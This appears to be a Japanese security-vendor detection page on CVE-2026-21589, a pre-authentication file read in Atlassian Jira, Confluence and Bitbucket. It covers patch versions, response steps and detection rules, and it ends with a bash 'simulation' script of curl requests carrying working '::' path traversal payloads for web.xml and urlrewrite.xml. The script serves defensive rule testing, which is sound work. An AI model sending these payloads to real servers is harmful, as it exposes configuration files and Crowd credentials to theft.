CVE-2026-21589: Atlassian JiraとConfluenceの認証前ファイル読み取り脆弱性
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
CVE-2026-21589という重要な認証前の任意ファイル読み取りの脆弱性は、Jira、Confluence、Bitbucketを含む複数のAtlassian製品に影響を与えます。攻撃者は、 :: デリミタに関するパストラバーサルの欠陥を悪用して、アプリケーションのウェブルート内の機密ファイルにアクセスできます。成功すれば、プレーンテキストのAtlassian Crowdの認証情報が露出する可能性があり、ID管理システムの行政上の侵害を引き起こす可能性があります。
調査
研究者は、その脆弱性を atlassian-plugins-webresource JARを調査し、影響を受けたリリースと修正されたリリースを比較しました。そこでは、特定の関数が二重コロンをフォワードスラッシュに変換することで、パストラバーサルが可能となります。研究者は、末尾にスラッシュがついた選択されたリソースプラグインをターゲットにすることで、 WEB-INF/web.xml and crowd.properties.
といった機密ファイルを取得することができました。
Atlassianは、セキュリティ通知を公開し、影響を受けたすべての製品に対して修正リリースを提供しています。組織は、薦められている修正版へのアップグレードを行ってください。たとえば、Bitbucket 10.5.1、Confluence 10.2.19、Jira 11.3.12などが該当します。二重コロンやエンコードされた文字、疑わしいリソース要求を含むパストラバーサルパターンを検出可能なWAFルールの展開は、さらなる保護を提供できます。
対応
URLに含まれる :: パストラバーサルの試みに関する疑わしい挙動が検出された場合、インシデントレスポンダーは直ちにターゲットとなっているAtlassianインスタンスを特定し、隔離する必要があります。Atlassian Crowd内の不正なアカウント作成、権限のエスカレーション、または他の異常な活動を確認してください。 WEB-INF リソースをターゲットにしたリクエストを監査し、 crowd.properties.
設定ファイルを通じて露出した可能性のある認証情報を更新してください。
この部分はまだ更新中です。
検出
管理者にJiraユーザーが追加された可能性があります(ウェブサーバー経由)
Jiraユーザーが作成された可能性があります(ウェブサーバー経由)
CVE-2026-21589(Atlassian Jira、Confluence、BitBucket認証前任意ファイル読み取り)悪用の試み(ウェブサーバー経由)
Atlassian製品のパストラバーサルによる任意ファイル読み取り [ウェブサーバー]
シミュレーション実行
-
攻撃の流れとコマンド: 攻撃者は、疑わしいAtlassianインスタンスに対して偵察を実行しています。彼らは、ダブルコロン(
::)を利用した特定のバイパス技術を活用するCVE-2026-21589の既知のエクスプロイトパターンを利用しています。目的は、web.xmlを抽出し、内部アプリケーション構造をマッピングし、さらなる横移動のための認証情報収集を可能にすることです。 -
回帰テストスクリプト:
#!/bin/bash # Atlassian Path Traversal 検出ルールをトリガーするためのシミュレーションスクリプト TARGET_URL="http://localhost" echo "[+] シミュレーション開始: Atlassian Path Traversal" echo "[*] ペイロード1: Jira web.xml トラバーサル試み..." curl -s -I "$TARGET_URL/download/resources/jira.webresources:color-picker-popup/images/..::..::..::..::..:WEB-INF::web.xml" echo "[*] ペイロード2: Confluence web.xml トラバーサル試み..." curl -s -I "$TARGET_URL/s/1/_/download/resources/com.atlassian.confluence.plugins.dashboard-actions/images/..::..::..::..::..::..::..:WEB-INF::web.xml" echo "[*] ペイロード3: Bitbucket urlrewrite.xml トラバーサル試み..." curl -s -I "$TARGET_URL/s/1.0/_/download/resources/com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL:avatar/avatar/..::..::..::..::..:WEB-INF::urlrewrite.xml" echo "[+] シミュレーション完了。SIEMでアラートを確認してください。" -
クリーンアップコマンド:
# システムには永続的な変更は加えられません。クリーンアップは不要です。 echo "[+] クリーンアップは不要です。シミュレーションは非破壊的でした。"